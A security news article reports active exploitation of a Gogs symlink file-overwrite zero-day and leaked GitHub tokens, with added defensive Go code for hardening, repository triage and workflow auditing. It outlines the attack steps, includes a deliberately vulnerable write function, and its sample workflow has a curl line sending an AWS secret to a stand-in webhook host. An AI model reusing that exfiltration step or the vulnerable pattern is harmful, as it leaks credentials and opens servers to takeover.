Unpatched Gogs Zero-Day Exploited Across 700+ Instances Amid Active Attacks

By Team-CWD, December 20, 2025

A high-severity unpatched security vulnerability in Gogs has come under active exploitation, with more than 700 compromised instances accessible over the internet, according to new findings from Wiz.

The flaw, tracked as CVE-2025-8110 (CVSS score: 8.7), is an arbitrary file overwrite in the file update API of the Go-based self-hosted Git service. A fix is reportedly in the works. Wiz said it discovered the zero-day by chance in July 2025 while investigating a malware infection on a customer’s machine.

“Improper symbolic link handling in the PutContents API in Gogs allows local execution of code,” according to a description of the vulnerability in CVE.org.

The cloud security company said CVE-2025-8110 is a bypass of a previously patched remote code execution flaw (CVE-2024-55947, CVSS score: 8.7) that allows an attacker to write a file to an arbitrary path on the server and gain SSH access to it. CVE-2024-55947 was addressed by the maintainers in December 2024.

Wiz said the fix Gogs put in place for CVE-2024-55947 could be circumvented because Git (and therefore Gogs) allows symbolic links in repositories, and those symlinks can point to files or directories outside the repository. Additionally, the Gogs API allows files to be modified outside of the regular Git protocol.

As a result, this failure to account for symlinks could be exploited by an attacker to achieve arbitrary code execution through a four-step process:

  • Create a standard git repository
  • Commit a single symbolic link pointing to a sensitive target
  • Use the PutContents API to write data to the symlink, causing the system to follow the link and overwrite the target file outside the repository
  • Overwrite “.git/config” (specifically the sshCommand) to execute arbitrary commands
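The root cause is a file-update path that follows a committed symlink instead of treating it as repository content. The Go program below is an added example, not Gogs code and not Wiz's proof of concept: it contrasts a naive "join and write" helper, which follows a symlink out of the working tree, with a hardened version that rejects traversal lexically, resolves symlinks in the parent directory, checks the result is still under the repository root, and opens the final component with O_NOFOLLOW so that a link there (dangling or not) is never followed. The function names (putContentsNaive, putContentsSafe, resolveInsideRepo) and the temporary directory layout in main are constructed for the demo.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
	"syscall"
)

// Sentinel errors returned by the hardened write path (hypothetical names).
var (
	ErrEscapesRepo    = errors.New("path resolves outside the repository")
	ErrThroughSymlink = errors.New("refusing to write through a symbolic link")
)

// putContentsNaive shows the failure mode: it joins the request path onto the
// repository root and writes. If relPath names a symlink committed into the
// repository, os.WriteFile follows it and the link target is overwritten,
// wherever it lives. Illustrative only; this is not the Gogs implementation.
func putContentsNaive(repoRoot, relPath string, data []byte) error {
	return os.WriteFile(filepath.Join(repoRoot, relPath), data, 0o644)
}

// putContentsSafe writes data to relPath inside repoRoot while refusing to
// follow symbolic links out of the working tree (hypothetical hardening).
func putContentsSafe(repoRoot, relPath string, data []byte) error {
	target, err := resolveInsideRepo(repoRoot, relPath)
	if err != nil {
		return err
	}
	// O_NOFOLLOW makes the kernel refuse if the final component is a symlink,
	// even a dangling one and even with O_CREATE, so there is no window between
	// a separate Lstat check and the write. O_NOFOLLOW is Unix-only.
	f, err := os.OpenFile(target, os.O_WRONLY|os.O_CREATE|os.O_TRUNC|syscall.O_NOFOLLOW, 0o644)
	if err != nil {
		if errors.Is(err, syscall.ELOOP) {
			return ErrThroughSymlink
		}
		return err
	}
	defer f.Close()
	_, err = f.Write(data)
	return err
}

// resolveInsideRepo maps relPath to a real filesystem path under repoRoot.
// It rejects absolute paths and ".." traversal lexically, then resolves
// symlinks in the parent directory and checks the result is still under the
// root. The final component is left unresolved for the O_NOFOLLOW open.
func resolveInsideRepo(repoRoot, relPath string) (string, error) {
	root, err := filepath.EvalSymlinks(repoRoot)
	if err != nil {
		return "", err
	}
	if root, err = filepath.Abs(root); err != nil {
		return "", err
	}
	if filepath.IsAbs(relPath) {
		return "", ErrEscapesRepo
	}
	clean := filepath.Clean(relPath)
	sep := string(filepath.Separator)
	if clean == "." || clean == ".." || strings.HasPrefix(clean, ".."+sep) {
		return "", ErrEscapesRepo
	}
	// The file itself may not exist yet (the API can create files), so resolve
	// its parent directory, which must already exist.
	full := filepath.Join(root, clean)
	realDir, err := filepath.EvalSymlinks(filepath.Dir(full))
	if err != nil {
		return "", err
	}
	if realDir != root && !strings.HasPrefix(realDir, root+sep) {
		return "", ErrEscapesRepo // a directory symlink led outside the tree
	}
	return filepath.Join(realDir, filepath.Base(full)), nil
}

func main() {
	// Constructed demo: a repository containing one symlink that points outside it.
	tmp, _ := os.MkdirTemp("", "repo-demo")
	defer os.RemoveAll(tmp)
	repo := filepath.Join(tmp, "repo")
	outside := filepath.Join(tmp, "outside")
	_ = os.MkdirAll(repo, 0o755)
	_ = os.MkdirAll(outside, 0o755)
	_ = os.WriteFile(filepath.Join(outside, "config"), []byte("original\n"), 0o644)
	_ = os.Symlink(filepath.Join(outside, "config"), filepath.Join(repo, "link"))

	fmt.Println("write via symlink:", putContentsSafe(repo, "link", []byte("changed\n")))
	fmt.Println("write normal file:", putContentsSafe(repo, "README.md", []byte("hello\n")))
	out, _ := os.ReadFile(filepath.Join(outside, "config"))
	fmt.Printf("outside/config still reads: %q\n", out)
}
```

The design choice worth noting is that the final component is never resolved: a dangling link that points at a not-yet-existing path outside the tree cannot be evaluated, yet a plain create-and-write would happily create that target, so the hardened path refuses any symlink there rather than trying to decide where it goes. Directory symlinks higher up are caught by comparing the resolved parent against the resolved root, which also keeps the check honest on systems where the temp directory itself sits behind a symlink.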

As for the malware deployed in the activity, it’s assessed to be a payload based on Supershell, an open-source command-and-control (C2) framework often used by Chinese hacking groups that can establish a reverse SSH shell to an attacker-controlled server (“119.45.176[.]196”).

Wiz said that the attackers behind the exploitation of CVE-2025-8110 left behind the created repositories (e.g., “IV79VAew / Km4zoh4s”) on the customer’s cloud workload when they could have taken steps to delete or mark them as private following the infection. This carelessness points to a “smash-and-grab” style campaign, it added.

In all, there are about 1,400 exposed Gogs instances, out of which more than 700 have exhibited signs of compromise, particularly the presence of 8-character random owner/repository names. All the identified repositories were created around July 10, 2025.

“This suggests that a single actor, or perhaps a group of actors all using the same tooling, are responsible for all infections,” researchers Gili Tikochinski and Yaara Shriki said.

Given that the vulnerability does not yet have a fix, users should disable open registration, limit the instance’s exposure to the internet, and scan instances for repositories with random 8-character names.
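To make the last recommendation concrete, here is an added Go example (not Wiz's tooling and not part of the original article) that triages a repository listing for the naming pattern described: both owner and repository names that look like 8-character random strings, or one such name plus a creation time near the reported date. The Repo and Finding types, the ±3-day window around July 10, 2025, the looksRandom8 heuristic and every sample entry except the quoted IV79VAew / Km4zoh4s pair are assumptions.

```go
package main

import (
	"fmt"
	"time"
)

// Repo is one owner/repository pair with its creation time, in the shape you
// would build from a Gogs instance's repository listing (assumed shape; obtain
// it with your own API client or from the database).
type Repo struct {
	Owner   string
	Name    string
	Created time.Time
}

// Finding pairs a repository with the reasons it was flagged for review.
type Finding struct {
	Repo    Repo
	Reasons []string
}

// looksRandom8 is a heuristic for the campaign's naming pattern: exactly 8
// ASCII letters/digits, both letter cases present, and few repeated
// characters. It is a triage signal, not proof of compromise.
func looksRandom8(s string) bool {
	if len(s) != 8 {
		return false
	}
	var upper, lower bool
	seen := map[rune]bool{}
	for _, r := range s {
		switch {
		case r >= 'A' && r <= 'Z':
			upper = true
		case r >= 'a' && r <= 'z':
			lower = true
		case r >= '0' && r <= '9':
		default:
			return false // separators, Unicode etc. are not in the pattern
		}
		seen[r] = true
	}
	return upper && lower && len(seen) >= 6
}

// Assumed window around the July 10, 2025 creation date reported for the
// identified repositories; widen it as needed.
var (
	windowStart = time.Date(2025, time.July, 7, 0, 0, 0, 0, time.UTC)
	windowEnd   = time.Date(2025, time.July, 14, 0, 0, 0, 0, time.UTC)
)

// triage returns the repositories worth a closer look: two or more indicators,
// i.e. both names random-looking, or one random-looking name plus a creation
// time inside the window.
func triage(repos []Repo) []Finding {
	var out []Finding
	for _, r := range repos {
		var reasons []string
		if looksRandom8(r.Owner) {
			reasons = append(reasons, "owner looks like an 8-char random string")
		}
		if looksRandom8(r.Name) {
			reasons = append(reasons, "repository name looks like an 8-char random string")
		}
		inWindow := !r.Created.Before(windowStart) && r.Created.Before(windowEnd)
		if inWindow && len(reasons) > 0 {
			reasons = append(reasons, "created in the reported campaign window")
		}
		if len(reasons) >= 2 {
			out = append(out, Finding{Repo: r, Reasons: reasons})
		}
	}
	return out
}

func main() {
	// Constructed sample listing; the first entry uses the names quoted in the
	// write-up, the rest are made up.
	sample := []Repo{
		{"IV79VAew", "Km4zoh4s", time.Date(2025, time.July, 10, 3, 12, 0, 0, time.UTC)},
		{"alice", "website", time.Date(2024, time.March, 2, 0, 0, 0, 0, time.UTC)},
		{"devteam", "WebApp01", time.Date(2025, time.July, 11, 0, 0, 0, 0, time.UTC)},
		{"Xq7bT2pL", "infra", time.Date(2025, time.February, 1, 0, 0, 0, 0, time.UTC)},
	}
	for _, f := range triage(sample) {
		fmt.Printf("%s/%s: %v\n", f.Repo.Owner, f.Repo.Name, f.Reasons)
	}
}
```

Expect some noise: a human-chosen name such as WebApp01 created inside the window is flagged alongside the real pattern, which is the point of returning reasons rather than a verdict, so an analyst can see why each entry surfaced and confirm it against the repository's contents (a lone committed symlink, per the write-up) before acting.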

The disclosure comes as Wiz also warned that threat actors are targeting leaked GitHub Personal Access Tokens (PATs) as high-value entry points for initial access to victim cloud environments, and even using them for cross-cloud lateral movement from GitHub to the cloud service provider (CSP) control plane.

The issue at hand is that a threat actor holding a PAT with basic read permissions can use GitHub’s code search API to discover the names of secrets referenced directly in a workflow’s YAML. To complicate matters further, if the compromised PAT has write permissions, attackers can execute malicious code and remove the traces of their activity.

“Attackers leveraged compromised PATs to discover GitHub Action Secrets names in the codebase, and used them in newly created malicious workflows to execute code and obtain CSP secrets,” researcher Shira Ayal said. “Threat actors have also been observed exfiltrating secrets to a webhook endpoint they control, completely bypassing Action logs.”
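The defensive counterpart to the technique described above is to audit the workflows that reference secrets and look at where those steps send data. The Go program below is an added example, not from Wiz or GitHub: it splits a workflow file into steps and flags any step that both references a `${{ secrets.* }}` value and contacts a host outside an allow-list, which is the shape of the webhook exfiltration quoted above. The allowedHosts list, the line-based step-splitting heuristic (it does not parse YAML properly) and the constructed sample workflow, with a `.invalid` hostname, are assumptions.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

var (
	// ${{ secrets.NAME }} references, capturing NAME.
	secretRef = regexp.MustCompile(`\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}`)
	// http(s) URLs, capturing the host part only.
	urlRef = regexp.MustCompile(`https?://([A-Za-z0-9.-]+)`)
)

// allowedHosts are destinations a workflow step may legitimately send data to.
// Assumption: tune this per organisation (artifact stores, package registries, ...).
var allowedHosts = map[string]bool{"api.github.com": true, "github.com": true}

// StepFinding records one step that mixes a secret with an unexpected host.
type StepFinding struct {
	Step    string   // first line of the step, for the report
	Secrets []string // secret names referenced in the step
	Hosts   []string // hosts contacted that are not on the allow-list
}

// splitSteps groups workflow lines into chunks that start at a YAML list item.
// Lines before the first item form a header chunk. List items that are not
// steps (e.g. branch filters) become harmless extra chunks with no secrets.
func splitSteps(workflow string) [][]string {
	var chunks [][]string
	for _, line := range strings.Split(workflow, "\n") {
		if strings.HasPrefix(strings.TrimSpace(line), "- ") || len(chunks) == 0 {
			chunks = append(chunks, nil)
		}
		chunks[len(chunks)-1] = append(chunks[len(chunks)-1], line)
	}
	return chunks
}

// auditWorkflow flags steps that reference at least one secret and contact at
// least one host outside allowedHosts.
func auditWorkflow(workflow string) []StepFinding {
	var findings []StepFinding
	for _, step := range splitSteps(workflow) {
		text := strings.Join(step, "\n")
		var secrets []string
		for _, m := range secretRef.FindAllStringSubmatch(text, -1) {
			secrets = append(secrets, m[1])
		}
		var hosts []string
		for _, m := range urlRef.FindAllStringSubmatch(text, -1) {
			if !allowedHosts[strings.ToLower(m[1])] {
				hosts = append(hosts, m[1])
			}
		}
		if len(secrets) > 0 && len(hosts) > 0 {
			findings = append(findings, StepFinding{
				Step: strings.TrimSpace(step[0]), Secrets: secrets, Hosts: hosts,
			})
		}
	}
	return findings
}

// sampleWorkflow is a constructed workflow: one step uses a secret locally, one
// posts a secret to an outside host, one talks to api.github.com.
const sampleWorkflow = `name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Configure cloud credentials
        run: aws sts get-caller-identity
        env:
          AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
      - name: Notify
        run: curl -s -X POST -d "k=${{ secrets.AWS_SECRET_ACCESS_KEY }}" https://hooks.example.invalid/ingest
      - name: Publish
        run: curl -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" https://api.github.com/repos/o/r/releases
`

func main() {
	for _, f := range auditWorkflow(sampleWorkflow) {
		fmt.Printf("%s -> secrets %v sent to %v\n", f.Step, f.Secrets, f.Hosts)
	}
}
```

Run this over every workflow in the organisation, including ones added in recent commits and on non-default branches, since the quoted activity used newly created workflows; a proper YAML parser would let you inspect `uses:` actions as well, which can contact hosts that never appear as a literal URL.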